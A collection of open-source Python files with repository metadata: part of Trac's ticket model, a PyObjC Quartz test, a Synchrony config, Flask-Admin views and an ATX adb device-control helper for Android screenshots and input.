SELECT time, author, newvalue FROM ticket_change
WHERE ticket=%%s AND field='comment'
AND (oldvalue=%%s OR oldvalue %s)
""" % db.like(),
(self.id, scnum, '%' + db.like_escape('.' + scnum))):
return row
# Fallback when comment number is not available in oldvalue
num = 0
for ts, old, author, comment in db("""
SELECT DISTINCT tc1.time, COALESCE(tc2.oldvalue,''),
tc2.author, COALESCE(tc2.newvalue,'')
FROM ticket_change AS tc1
LEFT OUTER JOIN ticket_change AS tc2
ON tc2.ticket=%s AND tc2.time=tc1.time
AND tc2.field='comment'
WHERE tc1.ticket=%s ORDER BY tc1.time
""", (self.id, self.id)):
# Use oldvalue if available, else count edits
try:
num = int(old.rsplit('.', 1)[-1])
except ValueError:
num += 1
if num == cnum:
break
else:
return
# Find author if NULL
if author is None:
for author, in db("""
SELECT author FROM ticket_change
WHERE ticket=%%s AND time=%%s AND NOT field %s LIMIT 1
""" % db.like(),
(self.id, ts, db.like_escape('_') + '%')):
break
return (ts, author, comment)
def simplify_whitespace(name):
"""Strip spaces and remove duplicate spaces within names"""
if name:
return ' '.join(name.split())
return name
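# Illustrative example (not part of the original module): the call
#   simplify_whitespace('  My   Component ')
# returns 'My Component' -- leading/trailing spaces are stripped and internal
# runs of whitespace collapse to a single space.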
class AbstractEnum(object):
type = None
ticket_col = None
def __init__(self, env, name=None, db=None):
if not self.ticket_col:
self.ticket_col = self.type
self.env = env
if name:
for value, in self.env.db_query("""
SELECT value FROM enum WHERE type=%s AND name=%s
""", (self.type, name)):
self.value = self._old_value = value
self.name = self._old_name = name
break
else:
raise ResourceNotFound(_("%(type)s %(name)s does not exist.",
type=self.type, name=name))
else:
self.value = self._old_value = None
self.name = self._old_name = None
exists = property(lambda self: self._old_value is not None)
def delete(self, db=None):
"""Delete the enum value.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot delete non-existent %s" % self.type
with self.env.db_transaction as db:
self.env.log.info("Deleting %s %s", self.type, self.name)
db("DELETE FROM enum WHERE type=%s AND value=%s",
(self.type, self._old_value))
# Re-order any enums that have higher value than deleted
# (close gap)
for enum in self.select(self.env):
try:
if int(enum.value) > int(self._old_value):
enum.value = unicode(int(enum.value) - 1)
enum.update()
except ValueError:
pass # Ignore cast error for this non-essential operation
TicketSystem(self.env).reset_ticket_fields()
self.value = self._old_value = None
self.name = self._old_name = None
def insert(self, db=None):
"""Add a new enum value.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert not self.exists, "Cannot insert existing %s" % self.type
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_('Invalid %(type)s name.', type=self.type))
with self.env.db_transaction as db:
self.env.log.debug("Creating new %s '%s'", self.type, self.name)
if not self.value:
row = db("SELECT COALESCE(MAX(%s), 0) FROM enum WHERE type=%%s"
% db.cast('value', 'int'),
(self.type,))
self.value = int(float(row[0][0])) + 1 if row else 0
db("INSERT INTO enum (type, name, value) VALUES (%s, %s, %s)",
(self.type, self.name, self.value))
TicketSystem(self.env).reset_ticket_fields()
self._old_name = self.name
self._old_value = self.value
def update(self, db=None):
"""Update the enum value.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot update non-existent %s" % self.type
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid %(type)s name.", type=self.type))
with self.env.db_transaction as db:
self.env.log.info("Updating %s '%s'", self.type, self.name)
db("UPDATE enum SET name=%s,value=%s WHERE type=%s AND name=%s",
(self.name, self.value, self.type, self._old_name))
if self.name != self._old_name:
# Update tickets
db("UPDATE ticket SET %s=%%s WHERE %s=%%s"
% (self.ticket_col, self.ticket_col),
(self.name, self._old_name))
TicketSystem(self.env).reset_ticket_fields()
self._old_name = self.name
self._old_value = self.value
@classmethod
def select(cls, env, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
with env.db_query as db:
for name, value in db("""
SELECT name, value FROM enum WHERE type=%s ORDER BY
""" + db.cast('value', 'int'),
(cls.type,)):
obj = cls(env)
obj.name = obj._old_name = name
obj.value = obj._old_value = value
yield obj
class Type(AbstractEnum):
type = 'ticket_type'
ticket_col = 'type'
class Status(object):
def __init__(self, env):
self.env = env
@classmethod
def select(cls, env, db=None):
for state in TicketSystem(env).get_all_status():
status = cls(env)
status.name = state
yield status
class Resolution(AbstractEnum):
type = 'resolution'
class Priority(AbstractEnum):
type = 'priority'
class Severity(AbstractEnum):
type = 'severity'
class Component(object):
def __init__(self, env, name=None, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
self.env = env
self.name = self._old_name = self.owner = self.description = None
if name:
for owner, description in self.env.db_query("""
SELECT owner, description FROM component WHERE name=%s
""", (name,)):
self.name = self._old_name = name
self.owner = owner or None
self.description = description or ''
break
else:
raise ResourceNotFound(_("Component %(name)s does not exist.",
name=name))
exists = property(lambda self: self._old_name is not None)
def delete(self, db=None):
"""Delete the component.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot delete non-existent component"
with self.env.db_transaction as db:
self.env.log.info("Deleting component %s", self.name)
db("DELETE FROM component WHERE name=%s", (self.name,))
self.name = self._old_name = None
TicketSystem(self.env).reset_ticket_fields()
def insert(self, db=None):
"""Insert a new component.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert not self.exists, "Cannot insert existing component"
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid component name."))
with self.env.db_transaction as db:
self.env.log.debug("Creating new component '%s'", self.name)
db("""INSERT INTO component (name,owner,description)
VALUES (%s,%s,%s)
""", (self.name, self.owner, self.description))
self._old_name = self.name
TicketSystem(self.env).reset_ticket_fields()
def update(self, db=None):
"""Update the component.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot update non-existent component"
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid component name."))
with self.env.db_transaction as db:
self.env.log.info("Updating component '%s'", self.name)
db("""UPDATE component SET name=%s,owner=%s, description=%s
WHERE name=%s
""", (self.name, self.owner, self.description,
self._old_name))
if self.name != self._old_name:
# Update tickets
db("UPDATE ticket SET component=%s WHERE component=%s",
(self.name, self._old_name))
self._old_name = self.name
TicketSystem(self.env).reset_ticket_fields()
@classmethod
def select(cls, env, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
for name, owner, description in env.db_query(
"SELECT name, owner, description FROM component ORDER BY name"):
component = cls(env)
component.name = component._old_name = name
component.owner = owner or None
component.description = description or ''
yield component
class Milestone(object):
def __init__(self, env, name=None, db=None):
self.env = env
if name:
self._fetch(name, db)
else:
self.name = None
self.due = self.completed = None
self.description = ''
self._to_old()
@property
def resource(self):
return Resource('milestone', self.name) ### .version !!!
def _fetch(self, name, db=None):
for row in self.env.db_query("""
SELECT name, due, completed, description
FROM milestone WHERE name=%s
""", (name,)):
self._from_database(row)
break
else:
raise ResourceNotFound(_("Milestone %(name)s does not exist.",
name=name), _("Invalid milestone name"))
exists = property(lambda self: self._old['name'] is not None)
is_completed = property(lambda self: self.completed is not None)
is_late = property(lambda self: self.due and
self.due < datetime.now(utc))
def _from_database(self, row):
name, due, completed, description = row
self.name = name
self.due = from_utimestamp(due) if due else None
self.completed = from_utimestamp(completed) if completed else None
self.description = description or ''
self._to_old()
def _to_old(self):
self._old = {'name': self.name, 'due': self.due,
'completed': self.completed,
'description': self.description}
def delete(self, retarget_to=None, author=None, db=None):
"""Delete the milestone.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
with self.env.db_transaction as db:
self.env.log.info("Deleting milestone %s", self.name)
db("DELETE FROM milestone WHERE name=%s", (self.name,))
# Retarget/reset tickets associated with this milestone
now = datetime.now(utc)
tkt_ids = [int(row[0]) for row in
db("SELECT id FROM ticket WHERE milestone=%s",
(self.name,))]
for tkt_id in tkt_ids:
ticket = Ticket(self.env, tkt_id, db)
ticket['milestone'] = retarget_to
comment = "Milestone %s deleted" % self.name # don't translate
ticket.save_changes(author, comment, now)
self._old['name'] = None
TicketSystem(self.env).reset_ticket_fields()
for listener in TicketSystem(self.env).milestone_change_listeners:
listener.milestone_deleted(self)
def insert(self, db=None):
"""Insert a new milestone.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid milestone name."))
with self.env.db_transaction as db:
self.env.log.debug("Creating new milestone '%s'", self.name)
db("""INSERT INTO milestone (name, due, completed, description)
VALUES (%s,%s,%s,%s)
""", (self.name, to_utimestamp(self.due),
to_utimestamp(self.completed), self.description))
self._to_old()
TicketSystem(self.env).reset_ticket_fields()
for listener in TicketSystem(self.env).milestone_change_listeners:
listener.milestone_created(self)
def update(self, db=None):
"""Update the milestone.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid milestone name."))
with self.env.db_transaction as db:
old_name = self._old['name']
self.env.log.info("Updating milestone '%s'", self.name)
db("""UPDATE milestone
SET name=%s, due=%s, completed=%s, description=%s
WHERE name=%s
""", (self.name, to_utimestamp(self.due),
to_utimestamp(self.completed),
self.description, old_name))
if self.name != old_name:
# Update milestone field in tickets
self.env.log.info("Updating milestone field of all tickets "
"associated with milestone '%s'", self.name)
db("UPDATE ticket SET milestone=%s WHERE milestone=%s",
(self.name, old_name))
TicketSystem(self.env).reset_ticket_fields()
# Reparent attachments
Attachment.reparent_all(self.env, 'milestone', old_name,
'milestone', self.name)
old_values = dict((k, v) for k, v in self._old.iteritems()
if getattr(self, k) != v)
self._to_old()
for listener in TicketSystem(self.env).milestone_change_listeners:
listener.milestone_changed(self, old_values)
@classmethod
def select(cls, env, include_completed=True, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
sql = "SELECT name, due, completed, description FROM milestone "
if not include_completed:
sql += "WHERE COALESCE(completed, 0)=0 "
milestones = []
for row in env.db_query(sql):
milestone = Milestone(env)
milestone._from_database(row)
milestones.append(milestone)
def milestone_order(m):
return (m.completed or utcmax,
m.due or utcmax,
embedded_numbers(m.name))
return sorted(milestones, key=milestone_order)
def group_milestones(milestones, include_completed):
"""Group milestones into "open with due date", "open with no due date",
and possibly "completed". Return a list of (label, milestones) tuples."""
def category(m):
return 1 if m.is_completed else 2 if m.due else 3
open_due_milestones, open_not_due_milestones, \
closed_milestones = partition([(m, category(m))
for m in milestones], (2, 3, 1))
groups = [
(_('Open (by due date)'), open_due_milestones),
(_('Open (no due date)'), open_not_due_milestones),
]
if include_completed:
groups.append((_('Closed'), closed_milestones))
return groups
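# Illustrative only (a hedged sketch, not part of the original module): given a
# Trac Environment `env`, group_milestones() is typically fed the result of
# Milestone.select() and yields (label, milestones) pairs, e.g.
#
#     milestones = Milestone.select(env, include_completed=True)
#     for label, group in group_milestones(milestones, include_completed=True):
#         print label, [m.name for m in group]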
class Version(object):
def __init__(self, env, name=None, db=None):
self.env = env
self.name = self._old_name = self.time = self.description = None
if name:
for time, description in self.env.db_query("""
SELECT time, description FROM version WHERE name=%s
""", (name,)):
self.name = self._old_name = name
self.time = from_utimestamp(time) if time else None
self.description = description or ''
break
else:
raise ResourceNotFound(_("Version %(name)s does not exist.",
name=name))
exists = property(lambda self: self._old_name is not None)
def delete(self, db=None):
"""Delete the version.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot delete non-existent version"
with self.env.db_transaction as db:
self.env.log.info("Deleting version %s", self.name)
db("DELETE FROM version WHERE name=%s", (self.name,))
self.name = self._old_name = None
TicketSystem(self.env).reset_ticket_fields()
def insert(self, db=None):
"""Insert a new version.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert not self.exists, "Cannot insert existing version"
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid version name."))
with self.env.db_transaction as db:
self.env.log.debug("Creating new version '%s'", self.name)
db("INSERT INTO version (name,time,description) VALUES (%s,%s,%s)",
(self.name, to_utimestamp(self.time), self.description))
self._old_name = self.name
TicketSystem(self.env).reset_ticket_fields()
def update(self, db=None):
"""Update the version.
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
assert self.exists, "Cannot update non-existent version"
self.name = simplify_whitespace(self.name)
if not self.name:
raise TracError(_("Invalid version name."))
with self.env.db_transaction as db:
self.env.log.info("Updating version '%s'", self.name)
db("""UPDATE version
SET name=%s, time=%s, description=%s WHERE name=%s
""", (self.name, to_utimestamp(self.time), self.description,
self._old_name))
if self.name != self._old_name:
# Update tickets
db("UPDATE ticket SET version=%s WHERE version=%s",
(self.name, self._old_name))
self._old_name = self.name
TicketSystem(self.env).reset_ticket_fields()
@classmethod
def select(cls, env, db=None):
"""
:since 1.0: the `db` parameter is no longer needed and will be removed
in version 1.1.1
"""
versions = []
for name, time, description in env.db_query("""
SELECT name, time, description FROM version"""):
version = cls(env)
version.name = version._old_name = name
version.time = from_utimestamp(time) if time else None
version.description = description or ''
versions.append(version)
def version_order(v):
return (v.time or utcmax, embedded_numbers(v.name))
return sorted(versions, key=version_order, reverse=True)
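# Illustrative only (a hedged sketch, not part of the original module): Version,
# Component and the AbstractEnum subclasses above all follow the same
# insert/update/delete lifecycle, e.g.
#
#     version = Version(env)
#     version.name = '1.0'
#     version.time = datetime.now(utc)
#     version.insert()
#     version.name = '1.0.1'
#     version.update()       # also retargets tickets that referenced '1.0'
#     version.delete()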
|
{
"content_hash": "355ee3eb9184a3d52fa493fee1c2ff56",
"timestamp": "",
"source": "github",
"line_count": 1149,
"max_line_length": 88,
"avg_line_length": 41.40644038294169,
"alnum_prop": 0.5018076341012275,
"repo_name": "i-rabot/tractogithub",
"id": "f53a8bd7b69725dc74c9936d21960110cb6a2a1e",
"size": "48358",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tracformatter/trac/ticket/model.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "72236"
},
{
"name": "HTML",
"bytes": "293190"
},
{
"name": "JavaScript",
"bytes": "82208"
},
{
"name": "Python",
"bytes": "2018196"
}
],
"symlink_target": ""
}
|
from PyObjCTools.TestSupport import *
from Quartz.QuartzCore import *
from Quartz import *
class TestCIPluginInterfaceHelper (NSObject):
def load_(self, h): return 1
class TestCIPlugInInterface (TestCase):
def testMethods(self):
self.assertResultIsBOOL(TestCIPluginInterfaceHelper.load_)
def no_testProtocol(self):
p = objc.protocolNamed('CIPlugInRegistration')
        self.assertIsInstance(p, objc.formal_protocol)
if __name__ == "__main__":
main()
|
{
"content_hash": "3cb58686be34ae33953cbd776aeabd91",
"timestamp": "",
"source": "github",
"line_count": 17,
"max_line_length": 66,
"avg_line_length": 28.647058823529413,
"alnum_prop": 0.7186858316221766,
"repo_name": "albertz/music-player",
"id": "57b7f028aeb99a5488956233434c2db61ebc11b6",
"size": "488",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "mac/pyobjc-framework-Quartz/PyObjCTest/test_ciplugininterface.py",
"mode": "33188",
"license": "bsd-2-clause",
"language": [
{
"name": "Assembly",
"bytes": "47481"
},
{
"name": "C",
"bytes": "435926"
},
{
"name": "C++",
"bytes": "149133"
},
{
"name": "CSS",
"bytes": "16435"
},
{
"name": "HTML",
"bytes": "914432"
},
{
"name": "JavaScript",
"bytes": "52869"
},
{
"name": "M",
"bytes": "10808"
},
{
"name": "Makefile",
"bytes": "13304"
},
{
"name": "Mathematica",
"bytes": "61418"
},
{
"name": "Objective-C",
"bytes": "2082720"
},
{
"name": "Objective-C++",
"bytes": "62427"
},
{
"name": "PostScript",
"bytes": "2783"
},
{
"name": "Prolog",
"bytes": "217"
},
{
"name": "Python",
"bytes": "7789845"
},
{
"name": "QMake",
"bytes": "9667"
},
{
"name": "Roff",
"bytes": "8329"
},
{
"name": "Shell",
"bytes": "3521"
}
],
"symlink_target": ""
}
|
import os
if 'SYNCHRONY_DATABASE' in os.environ:
SQLALCHEMY_DATABASE_URI = os.environ['SYNCHRONY_DATABASE']
else:
SQLALCHEMY_DATABASE_URI = "sqlite:///cache.db"
# Let users without accounts reap the benefits of decentralised web pages:
OPEN_PROXY = True
# If you haven't got an internet connection change this to 0.01
# to reduce the time taken before the system decides to check
# peers and the database:
HTTP_TIMEOUT = 1.00
# Allow people to register accounts on the login screen
PERMIT_NEW_ACCOUNTS = True
# Zero peer trust ratings instead of decrementing them
NO_PRISONERS = False
# Remove <script> nodes at the parser.
DISABLE_JAVASCRIPT = True
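# Illustrative only (assumption, not part of the original file): the database
# URI above can be overridden per deployment through the SYNCHRONY_DATABASE
# environment variable with any SQLAlchemy-compatible URI, e.g.
#
#     export SYNCHRONY_DATABASE="postgresql://synchrony:secret@localhost/synchrony"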
|
{
"content_hash": "e0d551432c1ebc498704d844a5bfef13",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 74,
"avg_line_length": 28.608695652173914,
"alnum_prop": 0.7659574468085106,
"repo_name": "Psybernetics/Synchrony",
"id": "cced50dd1edc34cccb3635109b91ba7bfdb479b4",
"size": "658",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "synchrony/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "159718"
},
{
"name": "HTML",
"bytes": "3106"
},
{
"name": "JavaScript",
"bytes": "814227"
},
{
"name": "Python",
"bytes": "287504"
}
],
"symlink_target": ""
}
|
from flask_admin.contrib.sqla import ModelView
class AdminUserView(ModelView):
"""Vista que permite realizar operaciones CRUD sobre el modelo User"""
column_list = ("name", "email", "skills", "roles")
class AdminRoleView(ModelView):
"""Vista que permite realizar operaciones CRUD sobre el modelo Role"""
column_list = ("name", "description")
class AdminSkillView(ModelView):
column_list = ("name", "description")
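# Illustrative only (a hedged sketch, not part of the original blueprint): these
# views are meant to be registered on a flask_admin.Admin instance together with
# the SQLAlchemy session; `app`, `db`, `User`, `Role` and `Skill` are assumed to
# be defined elsewhere in the application.
#
#     from flask_admin import Admin
#
#     admin = Admin(app, name="laborapp")
#     admin.add_view(AdminUserView(User, db.session))
#     admin.add_view(AdminRoleView(Role, db.session))
#     admin.add_view(AdminSkillView(Skill, db.session))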
|
{
"content_hash": "f61e3259ab400ed4ee5f5d85a4d0cab3",
"timestamp": "",
"source": "github",
"line_count": 20,
"max_line_length": 74,
"avg_line_length": 22.2,
"alnum_prop": 0.7027027027027027,
"repo_name": "AthelasPeru/laborapp",
"id": "d7e6e523bcac4691ed8f0d4a38b4c7b10ad3342d",
"size": "444",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "app/blueprints/admin/views.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "346803"
},
{
"name": "HTML",
"bytes": "25611"
},
{
"name": "JavaScript",
"bytes": "101056"
},
{
"name": "Mako",
"bytes": "412"
},
{
"name": "Python",
"bytes": "17308"
},
{
"name": "Ruby",
"bytes": "976"
},
{
"name": "Shell",
"bytes": "260"
}
],
"symlink_target": ""
}
|
from __future__ import absolute_import
import atexit
import os
import re
import json
import collections
import tempfile
from StringIO import StringIO
from PIL import Image
from atx import logutils
logger = logutils.getLogger(__name__)
_DISPLAY_RE = re.compile(
r'.*DisplayViewport{valid=true, .*orientation=(?P<orientation>\d+), .*deviceWidth=(?P<width>\d+), deviceHeight=(?P<height>\d+).*')
_PROP_PATTERN = re.compile(r'\[(?P<key>.*?)\]:\s*\[(?P<value>.*)\]')
class Device(object):
Display = collections.namedtuple('Display', ['width', 'height', 'rotation'])
Package = collections.namedtuple('Package', ['name', 'path'])
__minicap = '/data/local/tmp/minicap'
def __init__(self, client, serial):
''' TODO: client change to host, port '''
self._client = client
self._serial = serial
self._screenshot_method = 'minicap'
@property
def serial(self):
return self._serial
def raw_cmd(self, *args, **kwargs):
args = ['-s', self._serial] + list(args)
return self._client.raw_cmd(*args)
def run_cmd(self, *args):
"""
Unix style output, already replace \r\n to \n
"""
p = self.raw_cmd(*args)
return p.communicate()[0].replace('\r\n', '\n')
def shell(self, *args):
"""
Run command `adb shell`
"""
args = ['shell'] + list(args)
return self.run_cmd(*args)
def keyevent(self, key):
''' Call: adb shell input keyevent $key '''
self.shell('input', 'keyevent', key)
def remove(self, filename):
"""
Remove file from device
"""
output = self.shell('rm', filename)
# any output means rm failed.
return False if output else True
def install(self, filename):
"""
        TODO(ssx): Install apk into device, show progress
Args:
- filename(string): apk file path
"""
return self.run_cmd('install', '-rt', filename)
def uninstall(self, package_name, keep_data=False):
"""
Uninstall package
Args:
- package_name(string): package name ex: com.example.demo
- keep_data(bool): keep the data and cache directories
"""
if keep_data:
return self.run_cmd('uninstall', '-k', package_name)
else:
return self.run_cmd('uninstall', package_name)
def pull(self, source_file, target_file=None):
if target_file is None:
raise RuntimeError('Not supported now')
self.run_cmd('pull', source_file, target_file)
@property
def display(self):
'''
Return device width, height, rotation
'''
w, h = (0, 0)
for line in self.shell('dumpsys', 'display').splitlines():
m = _DISPLAY_RE.search(line, 0)
if not m:
continue
w = int(m.group('width'))
h = int(m.group('height'))
o = int(m.group('orientation'))
w, h = min(w, h), max(w, h)
return self.Display(w, h, o)
output = self.shell('LD_LIBRARY_PATH=/data/local/tmp', self.__minicap, '-i')
try:
data = json.loads(output)
(w, h, o) = (data['width'], data['height'], data['rotation']/90)
return self.Display(w, h, o)
except ValueError:
pass
def rotation(self):
"""
Android rotation
Return:
- int [0-4]
"""
return self.display.rotation
def properties(self):
'''
Android Properties, extracted from `adb shell getprop`
Returns:
dict of props, for
example:
{'ro.bluetooth.dun': 'true'}
'''
props = {}
        for line in self.shell('getprop').splitlines():
m = _PROP_PATTERN.match(line)
if m:
props[m.group('key')] = m.group('value')
return props
def packages(self):
"""
Show all packages
"""
pattern = re.compile(r'package:(/[^=]+\.apk)=([^\s]+)')
packages = []
for line in self.shell('pm', 'list', 'packages', '-f').splitlines():
m = pattern.match(line)
if not m:
continue
path, name = m.group(1), m.group(2)
packages.append(self.Package(name, path))
return packages
def _adb_screencap(self, scale=1.0):
"""
capture screen with adb shell screencap
"""
remote_file = tempfile.mktemp(dir='/data/local/tmp/', prefix='screencap-', suffix='.png')
local_file = tempfile.mktemp(prefix='atx-screencap-', suffix='.png')
self.shell('screencap', '-p', remote_file)
try:
self.pull(remote_file, local_file)
image = Image.open(local_file)
image.load() # because Image is a lazy load function
if scale is not None and scale != 1.0:
image = image.resize([int(scale * s) for s in image.size], Image.BICUBIC)
rotation = self.rotation()
if rotation:
method = getattr(Image, 'ROTATE_{}'.format(rotation*90))
image = image.transpose(method)
return image
finally:
self.remove(remote_file)
os.unlink(local_file)
def _adb_minicap(self, scale=1.0):
"""
capture screen with minicap
https://github.com/openstf/minicap
"""
remote_file = tempfile.mktemp(dir='/data/local/tmp/', prefix='minicap-', suffix='.jpg')
local_file = tempfile.mktemp(prefix='atx-minicap-', suffix='.jpg')
(w, h, r) = self.display
params = '{x}x{y}@{rx}x{ry}/{r}'.format(x=w, y=h, rx=int(w*scale), ry=int(h*scale), r=r*90)
try:
self.shell('LD_LIBRARY_PATH=/data/local/tmp', self.__minicap, '-s', '-P', params, '>', remote_file)
self.pull(remote_file, local_file)
with open(local_file, 'rb') as f:
image = Image.open(StringIO(f.read()))
return image
finally:
self.remove(remote_file)
os.unlink(local_file)
def screenshot(self, filename=None, scale=1.0, method=None):
"""
Take device screenshot
Args:
        - filename(string): optional, save into filename
- scale(float): scale size
- method(string): one of minicap,screencap
Return:
PIL.Image
"""
image = None
method = method or self._screenshot_method
if method == 'minicap':
try:
image = self._adb_minicap(scale)
except Exception as e:
logger.warn("use minicap failed, fallback to screencap. error detail: %s", e)
self._screenshot_method = 'screencap'
return self.screenshot(filename=filename, scale=scale)
elif method == 'screencap':
image = self._adb_screencap(scale)
else:
raise RuntimeError("No such method(%s)" % method)
if filename:
image.save(filename)
return image
def click(self, x, y):
'''
same as adb -s ${SERIALNO} shell input tap x y
FIXME(ssx): not tested on horizontal screen
'''
self.shell('input', 'tap', str(x), str(y))
def forward(self, local_port, remote_port):
'''
adb port forward. return local_port
TODO: not tested
'''
return self._client.forward(self.serial, local_port, remote_port)
def is_locked(self):
"""
Returns:
- lock state(bool)
Raises:
RuntimeError
"""
_lockScreenRE = re.compile('mShowingLockscreen=(true|false)')
m = _lockScreenRE.search(self.shell('dumpsys', 'window', 'policy'))
if m:
return (m.group(1) == 'true')
raise RuntimeError("Couldn't determine screen lock state")
def is_screen_on(self):
'''
Checks if the screen is ON.
Returns:
True if the device screen is ON
Raises:
RuntimeError
'''
_screenOnRE = re.compile('mScreenOnFully=(true|false)')
m = _screenOnRE.search(self.shell('dumpsys', 'window', 'policy'))
if m:
return (m.group(1) == 'true')
raise RuntimeError("Couldn't determine screen ON state")
def wake(self):
"""
Wake up device if device locked
"""
if not self.is_screen_on():
self.keyevent('POWER')
def is_keyboard_shown(self):
dim = self.shell('dumpsys', 'input_method')
if dim:
# FIXME: API >= 15 ?
return "mInputShown=true" in dim
return False
def current_app(self):
"""
Return: (package_name, activity)
Raises:
RuntimeError
"""
_focusedRE = re.compile('mFocusedApp=.*ActivityRecord{\w+ \w+ (?P<package>.*)/(?P<activity>.*) .*')
m = _focusedRE.search(self.shell('dumpsys', 'window', 'windows'))
if m:
return m.group('package'), m.group('activity')
raise RuntimeError("Couldn't get focused app")
|
{
"content_hash": "e22ac85b4ebe0b788105a0776ab76609",
"timestamp": "",
"source": "github",
"line_count": 294,
"max_line_length": 134,
"avg_line_length": 31.700680272108844,
"alnum_prop": 0.5335836909871244,
"repo_name": "Andy-hpliu/AirtestX",
"id": "dc36ce7b2b447dbb443e79e479456a914c75a96d",
"size": "9367",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "atx/adbkit/device.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Batchfile",
"bytes": "230"
},
{
"name": "CSS",
"bytes": "34684"
},
{
"name": "Go",
"bytes": "13043"
},
{
"name": "HTML",
"bytes": "28019"
},
{
"name": "JavaScript",
"bytes": "300119"
},
{
"name": "Makefile",
"bytes": "348"
},
{
"name": "Protocol Buffer",
"bytes": "5495"
},
{
"name": "Python",
"bytes": "394333"
},
{
"name": "Shell",
"bytes": "4162"
}
],
"symlink_target": ""
}
|